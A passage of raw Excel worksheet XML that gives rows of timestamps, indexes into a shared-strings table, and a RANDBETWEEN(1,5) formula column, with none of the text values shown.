        <v>3195</v>
      </c>
      <c r="F3273">
        <f t="shared" ca="1" si="51"/>
        <v>1</v>
      </c>
    </row>
    <row r="3274" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A3274" s="1">
        <v>43496.49422453704</v>
      </c>
      <c r="B3274" t="s">
        <v>5</v>
      </c>
      <c r="C3274" t="s">
        <v>6</v>
      </c>
      <c r="D3274" t="s">
        <v>25</v>
      </c>
      <c r="E3274" s="2" t="s">
        <v>3196</v>
      </c>
      <c r="F3274">
        <f t="shared" ca="1" si="51"/>
        <v>3</v>
      </c>
    </row>
    <row r="3275" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A3275" s="1">
        <v>43496.463391203702</v>
      </c>
      <c r="B3275" t="s">
        <v>5</v>
      </c>
      <c r="C3275" t="s">
        <v>10</v>
      </c>
      <c r="D3275" t="s">
        <v>6</v>
      </c>
      <c r="E3275" s="2" t="s">
        <v>3197</v>
      </c>
      <c r="F3275">
        <f t="shared" ca="1" si="51"/>
        <v>3</v>
      </c>
    </row>
    <row r="3276" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3276" s="1">
        <v>43496.436412037037</v>
      </c>
      <c r="B3276" t="s">
        <v>1305</v>
      </c>
      <c r="C3276" t="s">
        <v>48</v>
      </c>
      <c r="E3276" t="s">
        <v>3198</v>
      </c>
      <c r="F3276">
        <f t="shared" ca="1" si="51"/>
        <v>1</v>
      </c>
    </row>
    <row r="3277" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A3277" s="1">
        <v>43496.436018518521</v>
      </c>
      <c r="B3277" t="s">
        <v>13</v>
      </c>
      <c r="C3277" t="s">
        <v>260</v>
      </c>
      <c r="E3277" s="2" t="s">
        <v>3199</v>
      </c>
      <c r="F3277">
        <f t="shared" ca="1" si="51"/>
        <v>2</v>
      </c>
    </row>
    <row r="3278" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3278" s="1">
        <v>43496.433391203704</v>
      </c>
      <c r="B3278" t="s">
        <v>19</v>
      </c>
      <c r="C3278" t="s">
        <v>10</v>
      </c>
      <c r="D3278" t="s">
        <v>112</v>
      </c>
      <c r="E3278" t="s">
        <v>3200</v>
      </c>
      <c r="F3278">
        <f t="shared" ca="1" si="51"/>
        <v>5</v>
      </c>
    </row>
    <row r="3279" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3279" s="1">
        <v>43496.432534722226</v>
      </c>
      <c r="B3279" t="s">
        <v>19</v>
      </c>
      <c r="C3279" t="s">
        <v>463</v>
      </c>
      <c r="D3279" t="s">
        <v>312</v>
      </c>
      <c r="E3279" t="s">
        <v>3201</v>
      </c>
      <c r="F3279">
        <f t="shared" ca="1" si="51"/>
        <v>3</v>
      </c>
    </row>
    <row r="3280" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3280" s="1">
        <v>43496.430625000001</v>
      </c>
      <c r="B3280" t="s">
        <v>1305</v>
      </c>
      <c r="C3280" t="s">
        <v>10</v>
      </c>
      <c r="D3280" t="s">
        <v>89</v>
      </c>
      <c r="E3280" t="s">
        <v>3202</v>
      </c>
      <c r="F3280">
        <f t="shared" ca="1" si="51"/>
        <v>4</v>
      </c>
    </row>
    <row r="3281" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A3281" s="1">
        <v>43496.42796296296</v>
      </c>
      <c r="B3281" t="s">
        <v>13</v>
      </c>
      <c r="C3281" t="s">
        <v>48</v>
      </c>
      <c r="E3281" s="2" t="s">
        <v>3203</v>
      </c>
      <c r="F3281">
        <f t="shared" ca="1" si="51"/>
        <v>5</v>
      </c>
    </row>
    <row r="3282" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3282" s="1">
        <v>43496.42564814815</v>
      </c>
      <c r="B3282" t="s">
        <v>1305</v>
      </c>
      <c r="C3282" t="s">
        <v>10</v>
      </c>
      <c r="D3282" t="s">
        <v>23</v>
      </c>
      <c r="E3282" t="s">
        <v>3204</v>
      </c>
      <c r="F3282">
        <f t="shared" ca="1" si="51"/>
        <v>1</v>
      </c>
    </row>
    <row r="3283" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3283" s="1">
        <v>43496.418506944443</v>
      </c>
      <c r="B3283" t="s">
        <v>19</v>
      </c>
      <c r="C3283" t="s">
        <v>10</v>
      </c>
      <c r="D3283" t="s">
        <v>39</v>
      </c>
      <c r="E3283" t="s">
        <v>3205</v>
      </c>
      <c r="F3283">
        <f t="shared" ca="1" si="51"/>
        <v>2</v>
      </c>
    </row>
    <row r="3284" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3284" s="1">
        <v>43496.408321759256</v>
      </c>
      <c r="B3284" t="s">
        <v>13</v>
      </c>
      <c r="C3284" t="s">
        <v>48</v>
      </c>
      <c r="E3284" t="s">
        <v>3206</v>
      </c>
      <c r="F3284">
        <f t="shared" ca="1" si="51"/>
        <v>5</v>
      </c>
    </row>
    <row r="3285" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3285" s="1">
        <v>43496.394178240742</v>
      </c>
      <c r="B3285" t="s">
        <v>1305</v>
      </c>
      <c r="C3285" t="s">
        <v>41</v>
      </c>
      <c r="E3285" t="s">
        <v>3207</v>
      </c>
      <c r="F3285">
        <f t="shared" ca="1" si="51"/>
        <v>2</v>
      </c>
    </row>
    <row r="3286" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A3286" s="1">
        <v>43496.323182870372</v>
      </c>
      <c r="B3286" t="s">
        <v>19</v>
      </c>
      <c r="C3286" t="s">
        <v>71</v>
      </c>
      <c r="E3286" s="2" t="s">
        <v>3208</v>
      </c>
      <c r="F3286">
        <f t="shared" ca="1" si="51"/>
        <v>5</v>
      </c>
    </row>
    <row r="3287" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A3287" s="1">
        <v>43496.311249999999</v>
      </c>
      <c r="B3287" t="s">
        <v>19</v>
      </c>
      <c r="C3287" t="s">
        <v>48</v>
      </c>
      <c r="E3287" s="2" t="s">
        <v>3209</v>
      </c>
      <c r="F3287">
        <f t="shared" ca="1" si="51"/>
        <v>4</v>
      </c>
    </row>
    <row r="3288" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A3288" s="1">
        <v>43496.279872685183</v>
      </c>
      <c r="B3288" t="s">
        <v>19</v>
      </c>
      <c r="C3288" t="s">
        <v>1080</v>
      </c>
      <c r="E3288" s="2" t="s">
        <v>3210</v>
      </c>
      <c r="F3288">
        <f t="shared" ca="1" si="51"/>
        <v>4</v>
      </c>
    </row>
    <row r="3289" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A3289" s="1">
        <v>43496.270300925928</v>
      </c>
      <c r="B3289" t="s">
        <v>19</v>
      </c>
      <c r="C3289" t="s">
        <v>48</v>
      </c>
      <c r="E3289" s="2" t="s">
        <v>3211</v>
      </c>
      <c r="F3289">
        <f t="shared" ca="1" si="51"/>
        <v>3</v>
      </c>
    </row>
    <row r="3290" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A3290" s="1">
        <v>43496.262696759259</v>
      </c>
      <c r="B3290" t="s">
        <v>5</v>
      </c>
      <c r="C3290" t="s">
        <v>48</v>
      </c>
      <c r="E3290" s="2" t="s">
        <v>3212</v>
      </c>
      <c r="F3290">
        <f t="shared" ca="1" si="51"/>
        <v>4</v>
      </c>
    </row>
    <row r="3291" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3291" s="1">
        <v>43496.260706018518</v>
      </c>
      <c r="B3291" t="s">
        <v>13</v>
      </c>
      <c r="C3291" t="s">
        <v>48</v>
      </c>
      <c r="E3291" t="s">
        <v>3213</v>
      </c>
      <c r="F3291">
        <f t="shared" ca="1" si="51"/>
        <v>4</v>
      </c>
    </row>
    <row r="3292" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A3292" s="1">
        <v>43496.226261574076</v>
      </c>
      <c r="B3292" t="s">
        <v>19</v>
      </c>
      <c r="C3292" t="s">
        <v>41</v>
      </c>
      <c r="E3292" s="2" t="s">
        <v>3214</v>
      </c>
      <c r="F3292">
        <f t="shared" ca="1" si="51"/>
        <v>5</v>
      </c>
    </row>
    <row r="3293" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3293" s="1">
        <v>43496.215729166666</v>
      </c>
      <c r="B3293" t="s">
        <v>5</v>
      </c>
      <c r="C3293" t="s">
        <v>41</v>
      </c>
      <c r="F3293">
        <f t="shared" ca="1" si="51"/>
        <v>3</v>
      </c>
    </row>
    <row r="3294" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A3294" s="1">
        <v>43496.183321759258</v>
      </c>
      <c r="B3294" t="s">
        <v>35</v>
      </c>
      <c r="C3294" t="s">
        <v>69</v>
      </c>
      <c r="E3294" s="2" t="s">
        <v>3215</v>
      </c>
      <c r="F3294">
        <f t="shared" ca="1" si="51"/>
        <v>1</v>
      </c>
    </row>
    <row r="3295" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A3295" s="1">
        <v>43496.179143518515</v>
      </c>
      <c r="B3295" t="s">
        <v>1305</v>
      </c>
      <c r="C3295" t="s">
        <v>461</v>
      </c>
      <c r="E3295" s="2" t="s">
        <v>3216</v>
      </c>
      <c r="F3295">
        <f t="shared" ca="1" si="51"/>
        <v>2</v>
      </c>
    </row>
    <row r="3296" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A3296" s="1">
        <v>43496.16878472222</v>
      </c>
      <c r="B3296" t="s">
        <v>19</v>
      </c>
      <c r="C3296" t="s">
        <v>2552</v>
      </c>
      <c r="E3296" s="2" t="s">
        <v>3217</v>
      </c>
      <c r="F3296">
        <f t="shared" ca="1" si="51"/>
        <v>2</v>
      </c>
    </row>
    <row r="3297" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A3297" s="1">
        <v>43496.144826388889</v>
      </c>
      <c r="B3297" t="s">
        <v>19</v>
      </c>
      <c r="C3297" t="s">
        <v>724</v>
      </c>
      <c r="E3297" s="2" t="s">
        <v>3218</v>
      </c>
      <c r="F3297">
        <f t="shared" ca="1" si="51"/>
        <v>3</v>
      </c>
    </row>
    <row r="3298" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A3298" s="1">
        <v>43496.134641203702</v>
      </c>
      <c r="B3298" t="s">
        <v>19</v>
      </c>
      <c r="C3298" t="s">
        <v>461</v>
      </c>
      <c r="E3298" s="2" t="s">
        <v>3219</v>
      </c>
      <c r="F3298">
        <f t="shared" ca="1" si="51"/>
        <v>3</v>
      </c>
    </row>
    <row r="3299" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3299" s="1">
        <v>43496.133472222224</v>
      </c>
      <c r="B3299" t="s">
        <v>35</v>
      </c>
      <c r="C3299" t="s">
        <v>724</v>
      </c>
      <c r="E3299" t="s">
        <v>3220</v>
      </c>
      <c r="F3299">
        <f t="shared" ca="1" si="51"/>
        <v>4</v>
      </c>
    </row>
    <row r="3300" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A3300" s="1">
        <v>43496.116377314815</v>
      </c>
      <c r="B3300" t="s">
        <v>19</v>
      </c>
      <c r="C3300" t="s">
        <v>41</v>
      </c>
      <c r="E3300" s="2" t="s">
        <v>3221</v>
      </c>
      <c r="F3300">
        <f t="shared" ca="1" si="51"/>
        <v>1</v>
      </c>
    </row>
    <row r="3301" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3301" s="1">
        <v>43496.069594907407</v>
      </c>
      <c r="B3301" t="s">
        <v>5</v>
      </c>
      <c r="C3301" t="s">
        <v>41</v>
      </c>
      <c r="E3301" t="s">
        <v>3222</v>
      </c>
      <c r="F3301">
        <f t="shared" ca="1" si="51"/>
        <v>1</v>
      </c>
    </row>
    <row r="3302" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3302" s="1">
        <v>43496.05364583333</v>
      </c>
      <c r="B3302" t="s">
        <v>5</v>
      </c>
      <c r="C3302" t="s">
        <v>1931</v>
      </c>
      <c r="F3302">
        <f t="shared" ca="1" si="51"/>
        <v>1</v>
      </c>
    </row>
    <row r="3303" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3303" s="1">
        <v>43496.050925925927</v>
      </c>
      <c r="B3303" t="s">
        <v>35</v>
      </c>
      <c r="C3303" t="s">
        <v>41</v>
      </c>
      <c r="E3303" t="s">
        <v>3223</v>
      </c>
      <c r="F3303">
        <f t="shared" ca="1" si="51"/>
        <v>4</v>
      </c>
    </row>
    <row r="3304" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A3304" s="1">
        <v>43496.040763888886</v>
      </c>
      <c r="B3304" t="s">
        <v>19</v>
      </c>
      <c r="C3304" t="s">
        <v>454</v>
      </c>
      <c r="E3304" s="2" t="s">
        <v>3224</v>
      </c>
      <c r="F3304">
        <f t="shared" ca="1" si="51"/>
        <v>1</v>
      </c>
    </row>
    <row r="3305" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3305" s="1">
        <v>43495.987187500003</v>
      </c>
      <c r="B3305" t="s">
        <v>5</v>
      </c>
      <c r="C3305" t="s">
        <v>41</v>
      </c>
      <c r="E3305" t="s">
        <v>3225</v>
      </c>
      <c r="F3305">
        <f t="shared" ca="1" si="51"/>
        <v>3</v>
      </c>
    </row>
    <row r="3306" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3306" s="1">
        <v>43495.911030092589</v>
      </c>
      <c r="B3306" t="s">
        <v>5</v>
      </c>
      <c r="C3306" t="s">
        <v>314</v>
      </c>
      <c r="E3306" t="s">
        <v>3226</v>
      </c>
      <c r="F3306">
        <f t="shared" ca="1" si="51"/>
        <v>2</v>
      </c>
    </row>
    <row r="3307" spans="1:6" ht="285" x14ac:dyDescent="0.25">
      <c r="A3307" s="1">
        <v>43495.819050925929</v>
      </c>
      <c r="B3307" t="s">
        <v>5</v>
      </c>
      <c r="C3307" t="s">
        <v>408</v>
      </c>
      <c r="E3307" s="2" t="s">
        <v>3227</v>
      </c>
      <c r="F3307">
        <f t="shared" ca="1" si="51"/>
        <v>1</v>
      </c>
    </row>
    <row r="3308" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A3308" s="1">
        <v>43495.814571759256</v>
      </c>
      <c r="B3308" t="s">
        <v>5</v>
      </c>
      <c r="C3308" t="s">
        <v>10</v>
      </c>
      <c r="D3308" t="s">
        <v>94</v>
      </c>
      <c r="E3308" s="2" t="s">
        <v>3228</v>
      </c>
      <c r="F3308">
        <f t="shared" ca="1" si="51"/>
        <v>3</v>
      </c>
    </row>
    <row r="3309" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3309" s="1">
        <v>43495.793622685182</v>
      </c>
      <c r="B3309" t="s">
        <v>5</v>
      </c>
      <c r="C3309" t="s">
        <v>10</v>
      </c>
      <c r="D3309" t="s">
        <v>14</v>
      </c>
      <c r="E3309" t="s">
        <v>3229</v>
      </c>
      <c r="F3309">
        <f t="shared" ca="1" si="51"/>
        <v>5</v>
      </c>
    </row>
    <row r="3310" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3310" s="1">
        <v>43495.761099537034</v>
      </c>
      <c r="B3310" t="s">
        <v>5</v>
      </c>
      <c r="C3310" t="s">
        <v>140</v>
      </c>
      <c r="D3310" t="s">
        <v>234</v>
      </c>
      <c r="E3310" t="s">
        <v>3230</v>
      </c>
      <c r="F3310">
        <f t="shared" ca="1" si="51"/>
        <v>3</v>
      </c>
    </row>
    <row r="3311" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A3311" s="1">
        <v>43495.748449074075</v>
      </c>
      <c r="B3311" t="s">
        <v>5</v>
      </c>
      <c r="C3311" t="s">
        <v>10</v>
      </c>
      <c r="D3311" t="s">
        <v>94</v>
      </c>
      <c r="E3311" s="2" t="s">
        <v>3231</v>
      </c>
      <c r="F3311">
        <f t="shared" ca="1" si="51"/>
        <v>2</v>
      </c>
    </row>
    <row r="3312" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3312" s="1">
        <v>43495.708113425928</v>
      </c>
      <c r="B3312" t="s">
        <v>5</v>
      </c>
      <c r="C3312" t="s">
        <v>92</v>
      </c>
      <c r="F3312">
        <f t="shared" ca="1" si="51"/>
        <v>4</v>
      </c>
    </row>
    <row r="3313" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3313" s="1">
        <v>43495.685497685183</v>
      </c>
      <c r="B3313" t="s">
        <v>5</v>
      </c>
      <c r="C3313" t="s">
        <v>10</v>
      </c>
      <c r="D3313" t="s">
        <v>112</v>
      </c>
      <c r="E3313" t="s">
        <v>3232</v>
      </c>
      <c r="F3313">
        <f t="shared" ca="1" si="51"/>
        <v>2</v>
      </c>
    </row>
    <row r="3314" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3314" s="1">
        <v>43495.683495370373</v>
      </c>
      <c r="B3314" t="s">
        <v>19</v>
      </c>
      <c r="C3314" t="s">
        <v>10</v>
      </c>
      <c r="D3314" t="s">
        <v>6</v>
      </c>
      <c r="E3314" t="s">
        <v>3233</v>
      </c>
      <c r="F3314">
        <f t="shared" ca="1" si="51"/>
        <v>4</v>
      </c>
    </row>
    <row r="3315" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A3315" s="1">
        <v>43495.679675925923</v>
      </c>
      <c r="B3315" t="s">
        <v>5</v>
      </c>
      <c r="C3315" t="s">
        <v>10</v>
      </c>
      <c r="D3315" t="s">
        <v>23</v>
      </c>
      <c r="E3315" s="2" t="s">
        <v>3234</v>
      </c>
      <c r="F3315">
        <f t="shared" ca="1" si="51"/>
        <v>3</v>
      </c>
    </row>
    <row r="3316" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A3316" s="1">
        <v>43495.678668981483</v>
      </c>
      <c r="B3316" t="s">
        <v>13</v>
      </c>
      <c r="C3316" t="s">
        <v>6</v>
      </c>
      <c r="D3316" t="s">
        <v>821</v>
      </c>
      <c r="E3316" s="2" t="s">
        <v>3235</v>
      </c>
      <c r="F3316">
        <f t="shared" ca="1" si="51"/>
        <v>3</v>
      </c>
    </row>
    <row r="3317" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3317" s="1">
        <v>43495.673344907409</v>
      </c>
      <c r="B3317" t="s">
        <v>19</v>
      </c>
      <c r="C3317" t="s">
        <v>107</v>
      </c>
      <c r="E3317" t="s">
        <v>3236</v>
      </c>
      <c r="F3317">
        <f t="shared" ca="1" si="51"/>
        <v>4</v>
      </c>
    </row>
    <row r="3318" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3318" s="1">
        <v>43495.654398148145</v>
      </c>
      <c r="B3318" t="s">
        <v>13</v>
      </c>
      <c r="C3318" t="s">
        <v>10</v>
      </c>
      <c r="D3318" t="s">
        <v>112</v>
      </c>
      <c r="E3318" t="s">
        <v>3237</v>
      </c>
      <c r="F3318">
        <f t="shared" ca="1" si="51"/>
        <v>2</v>
      </c>
    </row>
    <row r="3319" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3319" s="1">
        <v>43495.645416666666</v>
      </c>
      <c r="B3319" t="s">
        <v>1305</v>
      </c>
      <c r="C3319" t="s">
        <v>471</v>
      </c>
      <c r="F3319">
        <f t="shared" ca="1" si="51"/>
        <v>5</v>
      </c>
    </row>
    <row r="3320" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3320" s="1">
        <v>43495.643020833333</v>
      </c>
      <c r="B3320" t="s">
        <v>13</v>
      </c>
      <c r="C3320" t="s">
        <v>10</v>
      </c>
      <c r="D3320" t="s">
        <v>89</v>
      </c>
      <c r="E3320" t="s">
        <v>3238</v>
      </c>
      <c r="F3320">
        <f t="shared" ca="1" si="51"/>
        <v>1</v>
      </c>
    </row>
    <row r="3321" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A3321" s="1">
        <v>43495.642835648148</v>
      </c>
      <c r="B3321" t="s">
        <v>13</v>
      </c>
      <c r="C3321" t="s">
        <v>10</v>
      </c>
      <c r="D3321" t="s">
        <v>36</v>
      </c>
      <c r="E3321" s="2" t="s">
        <v>3239</v>
      </c>
      <c r="F3321">
        <f t="shared" ca="1" si="51"/>
        <v>4</v>
      </c>
    </row>
    <row r="3322" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3322" s="1">
        <v>43495.640810185185</v>
      </c>
      <c r="B3322" t="s">
        <v>13</v>
      </c>
      <c r="C3322" t="s">
        <v>10</v>
      </c>
      <c r="D3322" t="s">
        <v>1091</v>
      </c>
      <c r="E3322" t="s">
        <v>3240</v>
      </c>
      <c r="F3322">
        <f t="shared" ca="1" si="51"/>
        <v>4</v>
      </c>
    </row>
    <row r="3323" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A3323" s="1">
        <v>43495.639976851853</v>
      </c>
      <c r="B3323" t="s">
        <v>19</v>
      </c>
      <c r="C3323" t="s">
        <v>6</v>
      </c>
      <c r="D3323" t="s">
        <v>25</v>
      </c>
      <c r="E3323" s="2" t="s">
        <v>3241</v>
      </c>
      <c r="F3323">
        <f t="shared" ca="1" si="51"/>
        <v>1</v>
      </c>
    </row>
    <row r="3324" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3324" s="1">
        <v>43495.616412037038</v>
      </c>
      <c r="B3324" t="s">
        <v>13</v>
      </c>
      <c r="C3324" t="s">
        <v>10</v>
      </c>
      <c r="D3324" t="s">
        <v>52</v>
      </c>
      <c r="E3324" t="s">
        <v>3242</v>
      </c>
      <c r="F3324">
        <f t="shared" ca="1" si="51"/>
        <v>3</v>
      </c>
    </row>
    <row r="3325" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3325" s="1">
        <v>43495.586550925924</v>
      </c>
      <c r="B3325" t="s">
        <v>19</v>
      </c>
      <c r="C3325" t="s">
        <v>10</v>
      </c>
      <c r="E3325" t="s">
        <v>3243</v>
      </c>
      <c r="F3325">
        <f t="shared" ca="1" si="51"/>
        <v>4</v>
      </c>
    </row>
    <row r="3326" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A3326" s="1">
        <v>43495.584409722222</v>
      </c>
      <c r="B3326" t="s">
        <v>19</v>
      </c>
      <c r="C3326" t="s">
        <v>166</v>
      </c>
      <c r="E3326" s="2" t="s">
        <v>3244</v>
      </c>
      <c r="F3326">
        <f t="shared" ca="1" si="51"/>
        <v>2</v>
      </c>
    </row>
    <row r="3327" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3327" s="1">
        <v>43495.580601851849</v>
      </c>
      <c r="B3327" t="s">
        <v>5</v>
      </c>
      <c r="C3327" t="s">
        <v>71</v>
      </c>
      <c r="F3327">
        <f t="shared" ca="1" si="51"/>
        <v>2</v>
      </c>
    </row>
    <row r="3328" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3328" s="1">
        <v>43495.572638888887</v>
      </c>
      <c r="B3328" t="s">
        <v>5</v>
      </c>
      <c r="C3328" t="s">
        <v>48</v>
      </c>
      <c r="F3328">
        <f t="shared" ca="1" si="51"/>
        <v>1</v>
      </c>
    </row>
    <row r="3329" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A3329" s="1">
        <v>43495.562511574077</v>
      </c>
      <c r="B3329" t="s">
        <v>19</v>
      </c>
      <c r="C3329" t="s">
        <v>10</v>
      </c>
      <c r="D3329" t="s">
        <v>36</v>
      </c>
      <c r="E3329" s="2" t="s">
        <v>3245</v>
      </c>
      <c r="F3329">
        <f t="shared" ca="1" si="51"/>
        <v>5</v>
      </c>
    </row>
    <row r="3330" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3330" s="1">
        <v>43495.558796296296</v>
      </c>
      <c r="B3330" t="s">
        <v>5</v>
      </c>
      <c r="C3330" t="s">
        <v>10</v>
      </c>
      <c r="D3330" t="s">
        <v>36</v>
      </c>
      <c r="E3330" t="s">
        <v>3246</v>
      </c>
      <c r="F3330">
        <f t="shared" ref="F3330:F3393" ca="1" si="52">RANDBETWEEN(1,5)</f>
        <v>5</v>
      </c>
    </row>
    <row r="3331" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3331" s="1">
        <v>43495.554097222222</v>
      </c>
      <c r="B3331" t="s">
        <v>5</v>
      </c>
      <c r="C3331" t="s">
        <v>71</v>
      </c>
      <c r="F3331">
        <f t="shared" ca="1" si="52"/>
        <v>2</v>
      </c>
    </row>
    <row r="3332" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A3332" s="1">
        <v>43495.54996527778</v>
      </c>
      <c r="B3332" t="s">
        <v>5</v>
      </c>
      <c r="C3332" t="s">
        <v>260</v>
      </c>
      <c r="E3332" s="2" t="s">
        <v>3247</v>
      </c>
      <c r="F3332">
        <f t="shared" ca="1" si="52"/>
        <v>5</v>
      </c>
    </row>
    <row r="3333" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3333" s="1">
        <v>43495.543333333335</v>
      </c>
      <c r="B3333" t="s">
        <v>19</v>
      </c>
      <c r="C3333" t="s">
        <v>41</v>
      </c>
      <c r="E3333" t="s">
        <v>3248</v>
      </c>
      <c r="F3333">
        <f t="shared" ca="1" si="52"/>
        <v>1</v>
      </c>
    </row>
    <row r="3334" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3334" s="1">
        <v>43495.538912037038</v>
      </c>
      <c r="B3334" t="s">
        <v>5</v>
      </c>
      <c r="C3334" t="s">
        <v>10</v>
      </c>
      <c r="D3334" t="s">
        <v>1036</v>
      </c>
      <c r="E3334" t="s">
        <v>3249</v>
      </c>
      <c r="F3334">
        <f t="shared" ca="1" si="52"/>
        <v>4</v>
      </c>
    </row>
    <row r="3335" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3335" s="1">
        <v>43495.514780092592</v>
      </c>
      <c r="B3335" t="s">
        <v>19</v>
      </c>
      <c r="C3335" t="s">
        <v>6</v>
      </c>
      <c r="D3335" t="s">
        <v>25</v>
      </c>
      <c r="E3335" t="s">
        <v>3250</v>
      </c>
      <c r="F3335">
        <f t="shared" ca="1" si="52"/>
        <v>2</v>
      </c>
    </row>
    <row r="3336" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3336" s="1">
        <v>43495.503125000003</v>
      </c>
      <c r="B3336" t="s">
        <v>1305</v>
      </c>
      <c r="C3336" t="s">
        <v>6</v>
      </c>
      <c r="D3336" t="s">
        <v>114</v>
      </c>
      <c r="E3336" t="s">
        <v>3251</v>
      </c>
      <c r="F3336">
        <f t="shared" ca="1" si="52"/>
        <v>3</v>
      </c>
    </row>
    <row r="3337" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A3337" s="1">
        <v>43495.501481481479</v>
      </c>
      <c r="B3337" t="s">
        <v>19</v>
      </c>
      <c r="C3337" t="s">
        <v>10</v>
      </c>
      <c r="E3337" s="2" t="s">
        <v>3252</v>
      </c>
      <c r="F3337">
        <f t="shared" ca="1" si="52"/>
        <v>4</v>
      </c>
    </row>
    <row r="3338" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3338" s="1">
        <v>43495.498043981483</v>
      </c>
      <c r="B3338" t="s">
        <v>13</v>
      </c>
      <c r="C3338" t="s">
        <v>10</v>
      </c>
      <c r="D3338" t="s">
        <v>330</v>
      </c>
      <c r="E3338" t="s">
        <v>3253</v>
      </c>
      <c r="F3338">
        <f t="shared" ca="1" si="52"/>
        <v>5</v>
      </c>
    </row>
    <row r="3339" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3339" s="1">
        <v>43495.489016203705</v>
      </c>
      <c r="B3339" t="s">
        <v>13</v>
      </c>
      <c r="C3339" t="s">
        <v>10</v>
      </c>
      <c r="D3339" t="s">
        <v>158</v>
      </c>
      <c r="E3339" t="s">
        <v>3254</v>
      </c>
      <c r="F3339">
        <f t="shared" ca="1" si="52"/>
        <v>1</v>
      </c>
    </row>
    <row r="3340" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3340" s="1">
        <v>43495.473194444443</v>
      </c>
      <c r="B3340" t="s">
        <v>13</v>
      </c>
      <c r="C3340" t="s">
        <v>10</v>
      </c>
      <c r="D3340" t="s">
        <v>36</v>
      </c>
      <c r="E3340" t="s">
        <v>3255</v>
      </c>
      <c r="F3340">
        <f t="shared" ca="1" si="52"/>
        <v>1</v>
      </c>
    </row>
    <row r="3341" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3341" s="1">
        <v>43495.469872685186</v>
      </c>
      <c r="B3341" t="s">
        <v>5</v>
      </c>
      <c r="C3341" t="s">
        <v>2108</v>
      </c>
      <c r="F3341">
        <f t="shared" ca="1" si="52"/>
        <v>3</v>
      </c>
    </row>
    <row r="3342" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A3342" s="1">
        <v>43495.46371527778</v>
      </c>
      <c r="B3342" t="s">
        <v>19</v>
      </c>
      <c r="C3342" t="s">
        <v>10</v>
      </c>
      <c r="D3342" t="s">
        <v>271</v>
      </c>
      <c r="E3342" s="2" t="s">
        <v>3256</v>
      </c>
      <c r="F3342">
        <f t="shared" ca="1" si="52"/>
        <v>5</v>
      </c>
    </row>
    <row r="3343" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A3343" s="1">
        <v>43495.44798611111</v>
      </c>
      <c r="B3343" t="s">
        <v>19</v>
      </c>
      <c r="C3343" t="s">
        <v>10</v>
      </c>
      <c r="D3343" t="s">
        <v>1056</v>
      </c>
      <c r="E3343" s="2" t="s">
        <v>3257</v>
      </c>
      <c r="F3343">
        <f t="shared" ca="1" si="52"/>
        <v>5</v>
      </c>
    </row>
    <row r="3344" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A3344" s="1">
